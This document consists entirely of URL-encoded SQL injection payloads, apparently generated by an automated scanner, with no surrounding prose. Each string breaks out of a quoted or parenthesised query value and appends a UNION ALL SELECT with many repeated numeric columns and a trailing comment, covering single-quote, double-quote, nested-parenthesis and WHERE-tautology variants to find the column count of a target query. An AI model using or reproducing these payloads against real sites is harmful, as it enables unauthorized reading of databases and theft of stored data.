-5687%22%29%20UNION%20ALL%20SELECT%209204%2C%209204%2C%209204%2C%209204%2C%209204%2C%209204%2C%209204%2C%209204%2C%209204%2C%209204%2C%209204%2C%209204%2C%209204%2C%209204%2C%209204%2C%209204%2C%209204%2C%209204%2C%209204%2C%209204%2C%209204%2C%209204%2C%209204%2C%209204%2C%209204%23%20AND%20%28%22bZym%22%20LIKE%20%22bZym -7144%22%29%20UNION%20ALL%20SELECT%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%2C%208335%23%20AND%20%28%22Tkil%22%20LIKE%20%22Tkil -7467%22%29%20UNION%20ALL%20SELECT%204816%2C%204816%2C%204816%2C%204816%2C%204816%2C%204816%2C%204816%2C%204816%2C%204816%2C%204816%2C%204816%2C%204816%2C%204816%2C%204816%2C%204816%2C%204816%2C%204816%2C%204816%2C%204816%2C%204816%2C%204816%2C%204816%2C%204816%2C%204816%2C%204816%2C%204816%2C%204816%23%20AND%20%28%22kIRr%22%20LIKE%20%22kIRr -3385%22%29%20UNION%20ALL%20SELECT%205940%2C%205940%2C%205940%2C%205940%2C%205940%2C%205940%2C%205940%2C%205940%2C%205940%2C%205940%2C%205940%2C%205940%2C%205940%2C%205940%2C%205940%2C%205940%2C%205940%2C%205940%2C%205940%2C%205940%2C%205940%2C%205940%2C%205940%2C%205940%2C%205940%2C%205940%2C%205940%2C%205940%23%20AND%20%28%22Jhue%22%20LIKE%20%22Jhue -1417%22%29%20UNION%20ALL%20SELECT%205943%2C%205943%2C%205943%2C%205943%2C%205943%2C%205943%2C%205943%2C%205943%2C%205943%2C%205943%2C%205943%2C%205943%2C%205943%2C%205943%2C%205943%2C%205943%2C%205943%2C%205943%2C%205943%2C%205943%2C%205943%2C%205943%2C%205943%2C%205943%2C%205943%2C%205943%2C%205943%2C%205943%2C%205943%23%20AND%20%28%22vVFH%22%20LIKE%20%22vVFH -3187%22%29%20UNION%20ALL%20SELECT%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%2C%209770%23%20AND%20%28%22knYK%22%20LIKE%20%22knYK -5456%22%29%29%20UNION%20ALL%20SELECT%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%2C%203201%23%20AND%20%28%28%22iJod%22%20LIKE%20%22iJod -1549%22%29%29%20UNION%20ALL%20SELECT%203049%2C%203049%2C%203049%2C%203049%2C%203049%2C%203049%2C%203049%2C%203049%2C%203049%2C%203049%2C%203049%2C%203049%2C%203049%2C%203049%2C%203049%2C%203049%2C%203049%2C%203049%2C%203049%2C%203049%2C%203049%2C%203049%23%20AND%20%28%28%22VFuN%22%20LIKE%20%22VFuN -2467%22%29%29%20UNION%20ALL%20SELECT%202011%2C%202011%2C%202011%2C%202011%2C%202011%2C%202011%2C%202011%2C%202011%2C%202011%2C%202011%2C%202011%2C%202011%2C%202011%2C%202011%2C%202011%2C%202011%2C%202011%2C%202011%2C%202011%2C%202011%2C%202011%2C%202011%2C%202011%23%20AND%20%28%28%22nrar%22%20LIKE%20%22nrar -1208%22%29%29%20UNION%20ALL%20SELECT%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%2C%207809%23%20AND%20%28%28%22EIRm%22%20LIKE%20%22EIRm -4396%22%29%29%20UNION%20ALL%20SELECT%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%23%20AND%20%28%28%22skoA%22%20LIKE%20%22skoA -2960%22%29%29%20UNION%20ALL%20SELECT%203689%2C%203689%2C%203689%2C%203689%2C%203689%2C%203689%2C%203689%2C%203689%2C%203689%2C%203689%2C%203689%2C%203689%2C%203689%2C%203689%2C%203689%2C%203689%2C%203689%2C%203689%2C%203689%2C%203689%2C%203689%2C%203689%2C%203689%2C%203689%2C%203689%2C%203689%23%20AND%20%28%28%22fpqH%22%20LIKE%20%22fpqH -3529%22%29%29%20UNION%20ALL%20SELECT%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%2C%203114%23%20AND%20%28%28%22dkzt%22%20LIKE%20%22dkzt -5065%22%29%29%20UNION%20ALL%20SELECT%207612%2C%207612%2C%207612%2C%207612%2C%207612%2C%207612%2C%207612%2C%207612%2C%207612%2C%207612%2C%207612%2C%207612%2C%207612%2C%207612%2C%207612%2C%207612%2C%207612%2C%207612%2C%207612%2C%207612%2C%207612%2C%207612%2C%207612%2C%207612%2C%207612%2C%207612%2C%207612%2C%207612%23%20AND%20%28%28%22RPSp%22%20LIKE%20%22RPSp -7201%22%29%29%20UNION%20ALL%20SELECT%209735%2C%209735%2C%209735%2C%209735%2C%209735%2C%209735%2C%209735%2C%209735%2C%209735%2C%209735%2C%209735%2C%209735%2C%209735%2C%209735%2C%209735%2C%209735%2C%209735%2C%209735%2C%209735%2C%209735%2C%209735%2C%209735%2C%209735%2C%209735%2C%209735%2C%209735%2C%209735%2C%209735%2C%209735%23%20AND%20%28%28%22pmjH%22%20LIKE%20%22pmjH -9434%22%29%29%20UNION%20ALL%20SELECT%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%23%20AND%20%28%28%22REdD%22%20LIKE%20%22REdD -2938%22%29%29%29%20UNION%20ALL%20SELECT%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%2C%208523%23%20AND%20%28%28%28%22isMH%22%20LIKE%20%22isMH -5078%22%29%29%29%20UNION%20ALL%20SELECT%203530%2C%203530%2C%203530%2C%203530%2C%203530%2C%203530%2C%203530%2C%203530%2C%203530%2C%203530%2C%203530%2C%203530%2C%203530%2C%203530%2C%203530%2C%203530%2C%203530%2C%203530%2C%203530%2C%203530%2C%203530%2C%203530%23%20AND%20%28%28%28%22Fqhz%22%20LIKE%20%22Fqhz -5861%22%29%29%29%20UNION%20ALL%20SELECT%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%2C%207494%23%20AND%20%28%28%28%22CGQd%22%20LIKE%20%22CGQd -3474%22%29%29%29%20UNION%20ALL%20SELECT%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%2C%203043%23%20AND%20%28%28%28%22OdKb%22%20LIKE%20%22OdKb -6957%22%29%29%29%20UNION%20ALL%20SELECT%202820%2C%202820%2C%202820%2C%202820%2C%202820%2C%202820%2C%202820%2C%202820%2C%202820%2C%202820%2C%202820%2C%202820%2C%202820%2C%202820%2C%202820%2C%202820%2C%202820%2C%202820%2C%202820%2C%202820%2C%202820%2C%202820%2C%202820%2C%202820%2C%202820%23%20AND%20%28%28%28%22Ysvo%22%20LIKE%20%22Ysvo -3018%22%29%29%29%20UNION%20ALL%20SELECT%202620%2C%202620%2C%202620%2C%202620%2C%202620%2C%202620%2C%202620%2C%202620%2C%202620%2C%202620%2C%202620%2C%202620%2C%202620%2C%202620%2C%202620%2C%202620%2C%202620%2C%202620%2C%202620%2C%202620%2C%202620%2C%202620%2C%202620%2C%202620%2C%202620%2C%202620%23%20AND%20%28%28%28%22Dptk%22%20LIKE%20%22Dptk -4722%22%29%29%29%20UNION%20ALL%20SELECT%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%2C%201012%23%20AND%20%28%28%28%22sRxa%22%20LIKE%20%22sRxa -7154%22%29%29%29%20UNION%20ALL%20SELECT%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%2C%201939%23%20AND%20%28%28%28%22fdOw%22%20LIKE%20%22fdOw -6654%22%29%29%29%20UNION%20ALL%20SELECT%205776%2C%205776%2C%205776%2C%205776%2C%205776%2C%205776%2C%205776%2C%205776%2C%205776%2C%205776%2C%205776%2C%205776%2C%205776%2C%205776%2C%205776%2C%205776%2C%205776%2C%205776%2C%205776%2C%205776%2C%205776%2C%205776%2C%205776%2C%205776%2C%205776%2C%205776%2C%205776%2C%205776%2C%205776%23%20AND%20%28%28%28%22VEEl%22%20LIKE%20%22VEEl -1895%22%29%29%29%20UNION%20ALL%20SELECT%201575%2C%201575%2C%201575%2C%201575%2C%201575%2C%201575%2C%201575%2C%201575%2C%201575%2C%201575%2C%201575%2C%201575%2C%201575%2C%201575%2C%201575%2C%201575%2C%201575%2C%201575%2C%201575%2C%201575%2C%201575%2C%201575%2C%201575%2C%201575%2C%201575%2C%201575%2C%201575%2C%201575%2C%201575%2C%201575%23%20AND%20%28%28%28%22BTmS%22%20LIKE%20%22BTmS -8124%22%20UNION%20ALL%20SELECT%208172%2C%208172%2C%208172%2C%208172%2C%208172%2C%208172%2C%208172%2C%208172%2C%208172%2C%208172%2C%208172%2C%208172%2C%208172%2C%208172%2C%208172%2C%208172%2C%208172%2C%208172%2C%208172%2C%208172%2C%208172%23%20AND%20%22gZPb%22%20LIKE%20%22gZPb -2554%22%20UNION%20ALL%20SELECT%203416%2C%203416%2C%203416%2C%203416%2C%203416%2C%203416%2C%203416%2C%203416%2C%203416%2C%203416%2C%203416%2C%203416%2C%203416%2C%203416%2C%203416%2C%203416%2C%203416%2C%203416%2C%203416%2C%203416%2C%203416%2C%203416%23%20AND%20%22ZxbE%22%20LIKE%20%22ZxbE -5523%22%20UNION%20ALL%20SELECT%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%23%20AND%20%22KIYZ%22%20LIKE%20%22KIYZ -1302%22%20UNION%20ALL%20SELECT%206542%2C%206542%2C%206542%2C%206542%2C%206542%2C%206542%2C%206542%2C%206542%2C%206542%2C%206542%2C%206542%2C%206542%2C%206542%2C%206542%2C%206542%2C%206542%2C%206542%2C%206542%2C%206542%2C%206542%2C%206542%2C%206542%2C%206542%2C%206542%23%20AND%20%22BvPI%22%20LIKE%20%22BvPI -6986%22%20UNION%20ALL%20SELECT%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%2C%208074%23%20AND%20%22nllo%22%20LIKE%20%22nllo -1829%22%20UNION%20ALL%20SELECT%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%2C%203374%23%20AND%20%22kLih%22%20LIKE%20%22kLih -7834%22%20UNION%20ALL%20SELECT%206835%2C%206835%2C%206835%2C%206835%2C%206835%2C%206835%2C%206835%2C%206835%2C%206835%2C%206835%2C%206835%2C%206835%2C%206835%2C%206835%2C%206835%2C%206835%2C%206835%2C%206835%2C%206835%2C%206835%2C%206835%2C%206835%2C%206835%2C%206835%2C%206835%2C%206835%2C%206835%23%20AND%20%22JQoq%22%20LIKE%20%22JQoq -7057%22%20UNION%20ALL%20SELECT%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%2C%202127%23%20AND%20%22xGxp%22%20LIKE%20%22xGxp -4620%22%20UNION%20ALL%20SELECT%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%23%20AND%20%22kecy%22%20LIKE%20%22kecy -3110%22%20UNION%20ALL%20SELECT%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%2C%209816%23%20AND%20%22tVGq%22%20LIKE%20%22tVGq -4207%29%20WHERE%205419%3D5419%20UNION%20ALL%20SELECT%205419%2C%205419%2C%205419%2C%205419%2C%205419%2C%205419%2C%205419%2C%205419%2C%205419%2C%205419%2C%205419%2C%205419%2C%205419%2C%205419%2C%205419%2C%205419%2C%205419%2C%205419%2C%205419%2C%205419%2C%205419%23 -1657%29%20WHERE%208594%3D8594%20UNION%20ALL%20SELECT%208594%2C%208594%2C%208594%2C%208594%2C%208594%2C%208594%2C%208594%2C%208594%2C%208594%2C%208594%2C%208594%2C%208594%2C%208594%2C%208594%2C%208594%2C%208594%2C%208594%2C%208594%2C%208594%2C%208594%2C%208594%2C%208594%23 -7822%29%20WHERE%208419%3D8419%20UNION%20ALL%20SELECT%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%2C%208419%23 -2125%29%20WHERE%201031%3D1031%20UNION%20ALL%20SELECT%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%2C%201031%23 -6820%29%20WHERE%202497%3D2497%20UNION%20ALL%20SELECT%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%2C%202497%23 -8636%29%20WHERE%206595%3D6595%20UNION%20ALL%20SELECT%206595%2C%206595%2C%206595%2C%206595%2C%206595%2C%206595%2C%206595%2C%206595%2C%206595%2C%206595%2C%206595%2C%206595%2C%206595%2C%206595%2C%206595%2C%206595%2C%206595%2C%206595%2C%206595%2C%206595%2C%206595%2C%206595%2C%206595%2C%206595%2C%206595%2C%206595%23 -6356%29%20WHERE%209876%3D9876%20UNION%20ALL%20SELECT%209876%2C%209876%2C%209876%2C%209876%2C%209876%2C%209876%2C%209876%2C%209876%2C%209876%2C%209876%2C%209876%2C%209876%2C%209876%2C%209876%2C%209876%2C%209876%2C%209876%2C%209876%2C%209876%2C%209876%2C%209876%2C%209876%2C%209876%2C%209876%2C%209876%2C%209876%2C%209876%23 -9233%29%20WHERE%205237%3D5237%20UNION%20ALL%20SELECT%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%23 -5542%29%20WHERE%202612%3D2612%20UNION%20ALL%20SELECT%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%2C%202612%23 -6132%29%20WHERE%202599%3D2599%20UNION%20ALL%20SELECT%202599%2C%202599%2C%202599%2C%202599%2C%202599%2C%202599%2C%202599%2C%202599%2C%202599%2C%202599%2C%202599%2C%202599%2C%202599%2C%202599%2C%202599%2C%202599%2C%202599%2C%202599%2C%202599%2C%202599%2C%202599%2C%202599%2C%202599%2C%202599%2C%202599%2C%202599%2C%202599%2C%202599%2C%202599%2C%202599%23 -7555%27%29%20WHERE%203468%3D3468%20UNION%20ALL%20SELECT%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%2C%203468%23 -3914%27%29%20WHERE%203009%3D3009%20UNION%20ALL%20SELECT%203009%2C%203009%2C%203009%2C%203009%2C%203009%2C%203009%2C%203009%2C%203009%2C%203009%2C%203009%2C%203009%2C%203009%2C%203009%2C%203009%2C%203009%2C%203009%2C%203009%2C%203009%2C%203009%2C%203009%2C%203009%2C%203009%23 -9557%27%29%20WHERE%205636%3D5636%20UNION%20ALL%20SELECT%205636%2C%205636%2C%205636%2C%205636%2C%205636%2C%205636%2C%205636%2C%205636%2C%205636%2C%205636%2C%205636%2C%205636%2C%205636%2C%205636%2C%205636%2C%205636%2C%205636%2C%205636%2C%205636%2C%205636%2C%205636%2C%205636%2C%205636%23 -8433%27%29%20WHERE%201245%3D1245%20UNION%20ALL%20SELECT%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%2C%201245%23 -9623%27%29%20WHERE%205514%3D5514%20UNION%20ALL%20SELECT%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%2C%205514%23 -4633%27%29%20WHERE%202741%3D2741%20UNION%20ALL%20SELECT%202741%2C%202741%2C%202741%2C%202741%2C%202741%2C%202741%2C%202741%2C%202741%2C%202741%2C%202741%2C%202741%2C%202741%2C%202741%2C%202741%2C%202741%2C%202741%2C%202741%2C%202741%2C%202741%2C%202741%2C%202741%2C%202741%2C%202741%2C%202741%2C%202741%2C%202741%23 -1236%27%29%20WHERE%201162%3D1162%20UNION%20ALL%20SELECT%201162%2C%201162%2C%201162%2C%201162%2C%201162%2C%201162%2C%201162%2C%201162%2C%201162%2C%201162%2C%201162%2C%201162%2C%201162%2C%201162%2C%201162%2C%201162%2C%201162%2C%201162%2C%201162%2C%201162%2C%201162%2C%201162%2C%201162%2C%201162%2C%201162%2C%201162%2C%201162%23 -2379%27%29%20WHERE%202114%3D2114%20UNION%20ALL%20SELECT%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%2C%202114%23 -1569%27%29%20WHERE%206017%3D6017%20UNION%20ALL%20SELECT%206017%2C%206017%2C%206017%2C%206017%2C%206017%2C%206017%2C%206017%2C%206017%2C%206017%2C%206017%2C%206017%2C%206017%2C%206017%2C%206017%2C%206017%2C%206017%2C%206017%2C%206017%2C%206017%2C%206017%2C%206017%2C%206017%2C%206017%2C%206017%2C%206017%2C%206017%2C%206017%2C%206017%2C%206017%23 -5105%27%29%20WHERE%202289%3D2289%20UNION%20ALL%20SELECT%202289%2C%202289%2C%202289%2C%202289%2C%202289%2C%202289%2C%202289%2C%202289%2C%202289%2C%202289%2C%202289%2C%202289%2C%202289%2C%202289%2C%202289%2C%202289%2C%202289%2C%202289%2C%202289%2C%202289%2C%202289%2C%202289%2C%202289%2C%202289%2C%202289%2C%202289%2C%202289%2C%202289%2C%202289%2C%202289%23 -1651%27%20WHERE%208193%3D8193%20UNION%20ALL%20SELECT%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%2C%208193%23 -9614%27%20WHERE%204408%3D4408%20UNION%20ALL%20SELECT%204408%2C%204408%2C%204408%2C%204408%2C%204408%2C%204408%2C%204408%2C%204408%2C%204408%2C%204408%2C%204408%2C%204408%2C%204408%2C%204408%2C%204408%2C%204408%2C%204408%2C%204408%2C%204408%2C%204408%2C%204408%2C%204408%23 -1962%27%20WHERE%209612%3D9612%20UNION%20ALL%20SELECT%209612%2C%209612%2C%209612%2C%209612%2C%209612%2C%209612%2C%209612%2C%209612%2C%209612%2C%209612%2C%209612%2C%209612%2C%209612%2C%209612%2C%209612%2C%209612%2C%209612%2C%209612%2C%209612%2C%209612%2C%209612%2C%209612%2C%209612%23 -3539%27%20WHERE%207229%3D7229%20UNION%20ALL%20SELECT%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%2C%207229%23 -3126%27%20WHERE%204921%3D4921%20UNION%20ALL%20SELECT%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%2C%204921%23 -9867%27%20WHERE%201016%3D1016%20UNION%20ALL%20SELECT%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%2C%201016%23 -5480%27%20WHERE%206063%3D6063%20UNION%20ALL%20SELECT%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%2C%206063%23 -6325%27%20WHERE%201843%3D1843%20UNION%20ALL%20SELECT%201843%2C%201843%2C%201843%2C%201843%2C%201843%2C%201843%2C%201843%2C%201843%2C%201843%2C%201843%2C%201843%2C%201843%2C%201843%2C%201843%2C%201843%2C%201843%2C%201843%2C%201843%2C%201843%2C%201843%2C%201843%2C%201843%2C%201843%2C%201843%2C%201843%2C%201843%2C%201843%2C%201843%23 -5689%27%20WHERE%209710%3D9710%20UNION%20ALL%20SELECT%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710%2C%209710%23 -7818%27%20WHERE%205746%3D5746%20UNION%20ALL%20SELECT%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%2C%205746%23 -6753%22%20WHERE%207990%3D7990%20UNION%20ALL%20SELECT%207990%2C%207990%2C%207990%2C%207990%2C%207990%2C%207990%2C%207990%2C%207990%2C%207990%2C%207990%2C%207990%2C%207990%2C%207990%2C%207990%2C%207990%2C%207990%2C%207990%2C%207990%2C%207990%2C%207990%2C%207990%23 -7140%22%20WHERE%205944%3D5944%20UNION%20ALL%20SELECT%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%2C%205944%23 -2969%22%20WHERE%202560%3D2560%20UNION%20ALL%20SELECT%202560%2C%202560%2C%202560%2C%202560%2C%202560%2C%202560%2C%202560%2C%202560%2C%202560%2C%202560%2C%202560%2C%202560%2C%202560%2C%202560%2C%202560%2C%202560%2C%202560%2C%202560%2C%202560%2C%202560%2C%202560%2C%202560%2C%202560%23 -2645%22%20WHERE%209519%3D9519%20UNION%20ALL%20SELECT%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%2C%209519%23 -7701%22%20WHERE%208059%3D8059%20UNION%20ALL%20SELECT%208059%2C%208059%2C%208059%2C%208059%2C%208059%2C%208059%2C%208059%2C%208059%2C%208059%2C%208059%2C%208059%2C%208059%2C%208059%2C%208059%2C%208059%2C%208059%2C%208059%2C%208059%2C%208059%2C%208059%2C%208059%2C%208059%2C%208059%2C%208059%2C%208059%23 -3514%22%20WHERE%207759%3D7759%20UNION%20ALL%20SELECT%207759%2C%207759%2C%207759%2C%207759%2C%207759%2C%207759%2C%207759%2C%207759%2C%207759%2C%207759%2C%207759%2C%207759%2C%207759%2C%207759%2C%207759%2C%207759%2C%207759%2C%207759%2C%207759%2C%207759%2C%207759%2C%207759%2C%207759%2C%207759%2C%207759%2C%207759%23 -2210%22%20WHERE%209571%3D9571%20UNION%20ALL%20SELECT%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%2C%209571%23 -1418%22%20WHERE%208477%3D8477%20UNION%20ALL%20SELECT%208477%2C%208477%2C%208477%2C%208477%2C%208477%2C%208477%2C%208477%2C%208477%2C%208477%2C%208477%2C%208477%2C%208477%2C%208477%2C%208477%2C%208477%2C%208477%2C%208477%2C%208477%2C%208477%2C%208477%2C%208477%2C%208477%2C%208477%2C%208477%2C%208477%2C%208477%2C%208477%2C%208477%23 -6093%22%20WHERE%204540%3D4540%20UNION%20ALL%20SELECT%204540%2C%204540%2C%204540%2C%204540%2C%204540%2C%204540%2C%204540%2C%204540%2C%204540%2C%204540%2C%204540%2C%204540%2C%204540%2C%204540%2C%204540%2C%204540%2C%204540%2C%204540%2C%204540%2C%204540%2C%204540%2C%204540%2C%204540%2C%204540%2C%204540%2C%204540%2C%204540%2C%204540%2C%204540%23 